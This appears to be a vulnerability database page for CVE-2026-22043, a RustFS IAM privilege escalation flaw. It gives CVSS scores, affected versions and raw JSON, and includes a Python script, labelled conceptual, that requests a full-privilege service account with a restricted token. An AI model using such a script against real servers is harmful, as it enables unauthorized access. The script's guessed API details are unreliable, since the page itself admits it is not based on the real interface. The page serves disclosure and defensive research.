Security Vulnerability Report
中文
CVE-2026-22043 CVSS 9.8 CRITICAL

CVE-2026-22043

Published: 2026-01-08 15:15:46
Last Modified: 2026-01-15 21:13:09
Source: [email protected]

Description

RustFS is a distributed object storage system built in Rust. In versions 1.0.0-alpha.13 through 1.0.0-alpha.78, a flawed `deny_only` short-circuit in RustFS IAM allows a restricted service account or STS credential to self-issue an unrestricted service account, inheriting the parent’s full privileges. This enables privilege escalation and bypass of session/inline policy restrictions. Version 1.0.0-alpha.79 fixes the issue.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:rustfs:rustfs:1.0.0:alpha13:*:*:*:rust:*:* - VULNERABLE
cpe:2.3:a:rustfs:rustfs:1.0.0:alpha14:*:*:*:rust:*:* - VULNERABLE
cpe:2.3:a:rustfs:rustfs:1.0.0:alpha15:*:*:*:rust:*:* - VULNERABLE
cpe:2.3:a:rustfs:rustfs:1.0.0:alpha16:*:*:*:rust:*:* - VULNERABLE
cpe:2.3:a:rustfs:rustfs:1.0.0:alpha17:*:*:*:rust:*:* - VULNERABLE
RustFS 1.0.0-alpha.13
RustFS 1.0.0-alpha.14
RustFS 1.0.0-alpha.15
RustFS 1.0.0-alpha.16
RustFS 1.0.0-alpha.17
RustFS 1.0.0-alpha.18
RustFS 1.0.0-alpha.78
RustFS < 1.0.0-alpha.79

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2026-22043 PoC - RustFS deny_only Privilege Escalation Note: This is a conceptual PoC based on the vulnerability description. Actual exploitation requires understanding the RustFS API. """ import requests import json TARGET = "https://rustfs-server.example.com" STS_TOKEN = "limited_sts_token_here" def exploit(): """ Exploitation steps: 1. Obtain a restricted service account or STS credential 2. Exploit the flawed deny_only short-circuit 3. Self-issue an unrestricted service account 4. Inherit parent's full privileges """ headers = { "Authorization": f"Bearer {STS_TOKEN}", "Content-Type": "application/json" } # Step 1: Attempt to create a new service account with elevated privileges # The vulnerable code allows this due to deny_only short-circuit payload = { "action": "iam:CreateServiceAccount", "name": "malicious_sa", "permissions": "*", # Request full privileges "parent_token": STS_TOKEN } try: response = requests.post( f"{TARGET}/api/v1/iam/serviceaccounts", headers=headers, json=payload, timeout=30 ) if response.status_code == 200: result = response.json() new_token = result.get("access_token") print(f"[!] Privilege Escalation Successful!") print(f"[!] New Service Account Token: {new_token}") return new_token else: print(f"[*] Request failed: {response.status_code}") print(f"[*] Response: {response.text}") return None except requests.exceptions.RequestException as e: print(f"[!] Connection error: {e}") return None if __name__ == "__main__": print("CVE-2026-22043 - RustFS deny_only Privilege Escalation PoC") print("=" * 60) exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22043", "sourceIdentifier": "[email protected]", "published": "2026-01-08T15:15:45.583", "lastModified": "2026-01-15T21:13:08.733", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RustFS is a distributed object storage system built in Rust. In versions 1.0.0-alpha.13 through 1.0.0-alpha.78, a flawed `deny_only` short-circuit in RustFS IAM allows a restricted service account or STS credential to self-issue an unrestricted service account, inheriting the parent’s full privileges. This enables privilege escalation and bypass of session/inline policy restrictions. Version 1.0.0-alpha.79 fixes the issue."}, {"lang": "es", "value": "RustFS es un sistema de almacenamiento de objetos distribuido construido en Rust. En las versiones 1.0.0-alpha.13 a 1.0.0-alpha.78, un cortocircuito defectuoso de 'deny_only' en el IAM de RustFS permite que una cuenta de servicio restringida o una credencial STS autoemita una cuenta de servicio sin restricciones, heredando los privilegios completos del padre. Esto permite la escalada de privilegios y la elusión de las restricciones de políticas de sesión/en línea. La versión 1.0.0-alpha.79 corrige el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}, {"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha13:*:*:*:rust:*:*", "matchCriteriaId": "BD2476D6-257C-4A96-BED4-D8B002402242"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha14:*:*:*:rust:*:*", "matchCriteriaId": "774EC64C-73ED-4D6B-893B-30A066DA934C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha15:*:*:*:rust:*:*", "matchCriteriaId": "4B567F4F-131F-4D4B-8C0C-9212F22F2BB3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha16:*:*:*:rust:*:*", "matchCriteriaId": "711F7641-A2B2-410B-B05D-6656F9A1798F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha17:*:*:*:rust:*:*", "matchCriteriaId": "EB79AC62-2B79-441C-BC09-4C834C32EADA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha18:*:*:*:rust:*:*", "matchCriteriaId": "62DE84EE-9F3B-460A-AC13-D2B8CCBC5B4E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha19:*:*:*:rust:*:*", "matchCriteriaId": "DEF70599-6550-49D2-9800-FE3249A66568"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha20:*:*:*:rust:*:*", "matchCriteriaId": "FDFE93A5-B6D7-482A-A891-4D8844604C07"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha21:*:*:*:rust:*:*", "matchCriteriaId": "79AC4F00-B006-46C2-863F-2946BB02B58E"}, {"vulnerable": true, "criter ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.